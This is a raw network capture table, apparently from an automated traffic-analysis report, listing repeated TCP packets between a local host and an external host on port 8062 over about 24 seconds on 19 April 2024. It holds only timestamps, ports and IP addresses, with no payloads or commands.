Apr 19, 2024 09:52:17.510183096 CEST	8062	49911	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:17.512084007 CEST	8062	49911	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:17.512145996 CEST	8062	49911	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:17.512444019 CEST	49911	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:17.512444019 CEST	49911	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:17.626477003 CEST	49912	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:17.838556051 CEST	8062	49911	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:17.939313889 CEST	8062	49912	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:17.939677954 CEST	49912	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:17.939968109 CEST	49912	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:18.252585888 CEST	8062	49912	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:18.254415035 CEST	8062	49912	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:18.254453897 CEST	8062	49912	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:18.254489899 CEST	49912	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:18.254544020 CEST	49912	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:18.254654884 CEST	49912	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:18.362349987 CEST	49913	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:18.567630053 CEST	8062	49912	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:18.701570034 CEST	8062	49913	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:18.701653957 CEST	49913	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:18.701883078 CEST	49913	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:19.041018009 CEST	8062	49913	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:19.042872906 CEST	8062	49913	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:19.042912006 CEST	8062	49913	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:19.042943001 CEST	49913	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:19.042968035 CEST	49913	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:19.046042919 CEST	49913	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:19.157919884 CEST	49914	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:19.385265112 CEST	8062	49913	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:19.481142998 CEST	8062	49914	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:19.481237888 CEST	49914	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:19.481570005 CEST	49914	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:19.804794073 CEST	8062	49914	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:19.807029009 CEST	8062	49914	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:19.807069063 CEST	8062	49914	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:19.807101011 CEST	49914	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:19.811099052 CEST	49914	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:19.923468113 CEST	49914	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:19.923584938 CEST	49915	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:20.245400906 CEST	8062	49915	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:20.246571064 CEST	8062	49914	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:20.246684074 CEST	49915	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:20.246851921 CEST	49915	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:20.568543911 CEST	8062	49915	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:20.570427895 CEST	8062	49915	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:20.570466995 CEST	8062	49915	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:20.570485115 CEST	49915	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:20.570519924 CEST	49915	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:20.570647955 CEST	49915	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:20.676153898 CEST	49916	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:20.892265081 CEST	8062	49915	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:20.991977930 CEST	8062	49916	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:20.992086887 CEST	49916	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:20.992227077 CEST	49916	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:21.307842016 CEST	8062	49916	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:21.310015917 CEST	8062	49916	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:21.310071945 CEST	8062	49916	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:21.310090065 CEST	49916	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:21.310161114 CEST	49916	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:21.310224056 CEST	49916	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:21.424326897 CEST	49917	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:21.627737999 CEST	8062	49916	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:21.744251966 CEST	8062	49917	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:21.744601965 CEST	49917	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:21.748625040 CEST	49917	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:22.068589926 CEST	8062	49917	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:22.070453882 CEST	8062	49917	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:22.070492983 CEST	8062	49917	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:22.070750952 CEST	49917	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:22.071132898 CEST	49917	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:22.173295021 CEST	49918	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:22.391073942 CEST	8062	49917	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:22.493520021 CEST	8062	49918	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:22.494124889 CEST	49918	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:22.494339943 CEST	49918	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:22.814529896 CEST	8062	49918	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:22.816891909 CEST	8062	49918	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:22.816935062 CEST	8062	49918	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:22.816968918 CEST	49918	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:22.817055941 CEST	49918	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:22.822479010 CEST	49918	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:22.939560890 CEST	49919	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:23.142430067 CEST	8062	49918	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:23.263113976 CEST	8062	49919	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:23.263223886 CEST	49919	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:23.263453007 CEST	49919	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:23.587081909 CEST	8062	49919	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:23.589129925 CEST	8062	49919	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:23.589169979 CEST	8062	49919	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:23.590722084 CEST	49919	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:23.590722084 CEST	49919	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:23.704762936 CEST	49920	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:23.914372921 CEST	8062	49919	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:24.030944109 CEST	8062	49920	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:24.036612034 CEST	49920	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:24.040082932 CEST	49920	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:24.366018057 CEST	8062	49920	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:24.367832899 CEST	8062	49920	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:24.368012905 CEST	8062	49920	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:24.368340015 CEST	49920	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:24.509710073 CEST	49920	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:24.629992962 CEST	49921	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:24.835688114 CEST	8062	49920	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:24.942797899 CEST	8062	49921	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:24.943011045 CEST	49921	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:25.451037884 CEST	49921	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:25.763684034 CEST	8062	49921	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:25.765563011 CEST	8062	49921	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:25.765603065 CEST	8062	49921	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:25.765669107 CEST	49921	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:25.765774012 CEST	49921	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:25.877173901 CEST	49922	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:26.078188896 CEST	8062	49921	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:26.198860884 CEST	8062	49922	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:26.198951960 CEST	49922	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:26.199136019 CEST	49922	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:26.520735979 CEST	8062	49922	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:26.522624969 CEST	8062	49922	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:26.522665024 CEST	8062	49922	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:26.522684097 CEST	49922	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:26.522715092 CEST	49922	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:26.522809029 CEST	49922	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:26.626894951 CEST	49923	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:26.844480038 CEST	8062	49922	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:26.939151049 CEST	8062	49923	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:26.939327002 CEST	49923	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:26.944150925 CEST	49923	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:27.256293058 CEST	8062	49923	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:27.258083105 CEST	8062	49923	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:27.258124113 CEST	8062	49923	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:27.258145094 CEST	49923	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:27.258168936 CEST	49923	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:27.258290052 CEST	49923	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:27.377101898 CEST	49924	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:27.570357084 CEST	8062	49923	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:27.699161053 CEST	8062	49924	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:27.699414015 CEST	49924	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:27.701443911 CEST	49924	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:28.023293972 CEST	8062	49924	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:28.025849104 CEST	8062	49924	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:28.025888920 CEST	8062	49924	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:28.026052952 CEST	49924	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:28.026052952 CEST	49924	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:28.026145935 CEST	49924	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:28.142358065 CEST	49925	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:28.348086119 CEST	8062	49924	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:28.465426922 CEST	8062	49925	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:28.465528011 CEST	49925	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:28.465812922 CEST	49925	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:28.788847923 CEST	8062	49925	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:28.790740967 CEST	8062	49925	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:28.790781975 CEST	8062	49925	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:28.790812016 CEST	49925	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:28.790880919 CEST	49925	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:28.790939093 CEST	49925	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:28.908700943 CEST	49926	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:29.114093065 CEST	8062	49925	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:29.243285894 CEST	8062	49926	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:29.243412971 CEST	49926	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:29.243601084 CEST	49926	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:29.578059912 CEST	8062	49926	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:29.579864025 CEST	8062	49926	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:29.579904079 CEST	8062	49926	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:29.579946041 CEST	49926	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:29.580012083 CEST	49926	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:29.580111980 CEST	49926	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:29.690895081 CEST	49927	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:29.914519072 CEST	8062	49926	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:30.028176069 CEST	8062	49927	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:30.028310061 CEST	49927	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:30.028543949 CEST	49927	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:30.365761042 CEST	8062	49927	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:30.367630005 CEST	8062	49927	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:30.367674112 CEST	8062	49927	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:30.367830992 CEST	49927	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:30.367831945 CEST	49927	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:30.367921114 CEST	49927	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:30.489074945 CEST	49928	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:30.705125093 CEST	8062	49927	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:30.808574915 CEST	8062	49928	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:30.808661938 CEST	49928	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:30.808881998 CEST	49928	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:31.128330946 CEST	8062	49928	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:31.132325888 CEST	8062	49928	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:31.132369995 CEST	8062	49928	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:31.132385969 CEST	49928	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:31.132422924 CEST	49928	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:31.132519007 CEST	49928	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:31.237081051 CEST	49929	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:31.452030897 CEST	8062	49928	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:31.562107086 CEST	8062	49929	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:31.562628984 CEST	49929	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:31.562628984 CEST	49929	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:31.887820959 CEST	8062	49929	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:31.889624119 CEST	8062	49929	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:31.889664888 CEST	8062	49929	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:31.889687061 CEST	49929	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:31.889755964 CEST	49929	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:31.889889956 CEST	49929	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:32.002366066 CEST	49930	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:32.214855909 CEST	8062	49929	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:32.333762884 CEST	8062	49930	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:32.333870888 CEST	49930	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:32.334156036 CEST	49930	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:32.665322065 CEST	8062	49930	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:32.667088032 CEST	8062	49930	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:32.667124987 CEST	8062	49930	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:32.667151928 CEST	49930	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:32.667217016 CEST	49930	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:32.667279959 CEST	49930	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:32.784980059 CEST	49931	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:32.998475075 CEST	8062	49930	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:33.106545925 CEST	8062	49931	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:33.106712103 CEST	49931	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:33.107034922 CEST	49931	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:33.428733110 CEST	8062	49931	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:33.430491924 CEST	8062	49931	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:33.430531979 CEST	8062	49931	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:33.430562019 CEST	49931	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:33.430636883 CEST	49931	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:33.430918932 CEST	49931	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:33.548253059 CEST	49932	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:33.752554893 CEST	8062	49931	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:33.864171028 CEST	8062	49932	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:33.866564989 CEST	49932	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:33.866564989 CEST	49932	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:34.182409048 CEST	8062	49932	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:34.184277058 CEST	8062	49932	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:34.184315920 CEST	8062	49932	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:34.184344053 CEST	49932	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:34.184390068 CEST	49932	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:34.184499025 CEST	49932	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:34.298625946 CEST	49933	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:34.500031948 CEST	8062	49932	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:34.614545107 CEST	8062	49933	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:34.614748955 CEST	49933	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:34.614834070 CEST	49933	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:34.930612087 CEST	8062	49933	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:34.932607889 CEST	8062	49933	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:34.932648897 CEST	8062	49933	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:34.932678938 CEST	49933	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:34.932758093 CEST	49933	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:34.932854891 CEST	49933	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:35.048146963 CEST	49934	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:35.248528004 CEST	8062	49933	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:35.367032051 CEST	8062	49934	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:35.367120981 CEST	49934	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:35.367280960 CEST	49934	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:35.686152935 CEST	8062	49934	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:35.688584089 CEST	8062	49934	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:35.688604116 CEST	8062	49934	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:35.688827991 CEST	49934	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:35.688827991 CEST	49934	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:35.810481071 CEST	49935	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:36.007992029 CEST	8062	49934	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:36.125155926 CEST	8062	49935	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:36.126507998 CEST	49935	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:36.126899004 CEST	49935	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:36.441713095 CEST	8062	49935	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:36.444078922 CEST	8062	49935	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:36.444137096 CEST	8062	49935	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:36.444174051 CEST	49935	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:36.444952965 CEST	49935	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:36.553241968 CEST	49935	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:36.554383039 CEST	49936	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:36.867960930 CEST	8062	49935	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:36.870467901 CEST	8062	49936	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:36.870661020 CEST	49936	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:36.870925903 CEST	49936	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:37.186923027 CEST	8062	49936	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:37.188891888 CEST	8062	49936	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:37.188934088 CEST	8062	49936	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:37.188954115 CEST	49936	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:37.188992977 CEST	49936	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:37.189116001 CEST	49936	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:37.298973083 CEST	49937	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:37.505363941 CEST	8062	49936	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:37.624649048 CEST	8062	49937	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:37.624978065 CEST	49937	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:37.626458883 CEST	49937	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:37.952008009 CEST	8062	49937	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:37.953973055 CEST	8062	49937	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:37.954010963 CEST	8062	49937	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:37.954096079 CEST	49937	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:37.954190969 CEST	49937	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:37.954267025 CEST	49937	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:38.064445019 CEST	49938	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:38.279990911 CEST	8062	49937	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:38.387641907 CEST	8062	49938	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:38.387801886 CEST	49938	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:38.388084888 CEST	49938	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:38.711396933 CEST	8062	49938	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:38.713538885 CEST	8062	49938	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:38.713581085 CEST	8062	49938	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:38.713716030 CEST	49938	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:38.713716030 CEST	49938	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:38.713833094 CEST	49938	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:38.831124067 CEST	49939	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:39.037184954 CEST	8062	49938	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:39.145961046 CEST	8062	49939	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:39.146054983 CEST	49939	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:39.146315098 CEST	49939	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:39.461226940 CEST	8062	49939	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:39.463151932 CEST	8062	49939	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:39.463190079 CEST	8062	49939	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:39.463243961 CEST	49939	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:39.463311911 CEST	49939	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:39.463363886 CEST	49939	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:39.582376003 CEST	49940	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:39.778105974 CEST	8062	49939	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:39.910695076 CEST	8062	49940	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:39.914407969 CEST	49940	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:39.914557934 CEST	49940	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:40.242362976 CEST	8062	49940	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:40.244908094 CEST	8062	49940	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:40.244947910 CEST	8062	49940	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:40.244982004 CEST	49940	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:40.245155096 CEST	49940	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:40.367619991 CEST	49940	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:40.367630959 CEST	49941	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:40.685405970 CEST	8062	49941	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:40.685506105 CEST	49941	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:40.685718060 CEST	49941	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:40.695404053 CEST	8062	49940	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:41.003314018 CEST	8062	49941	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:41.005141020 CEST	8062	49941	8.218.236.5	192.168.2.4
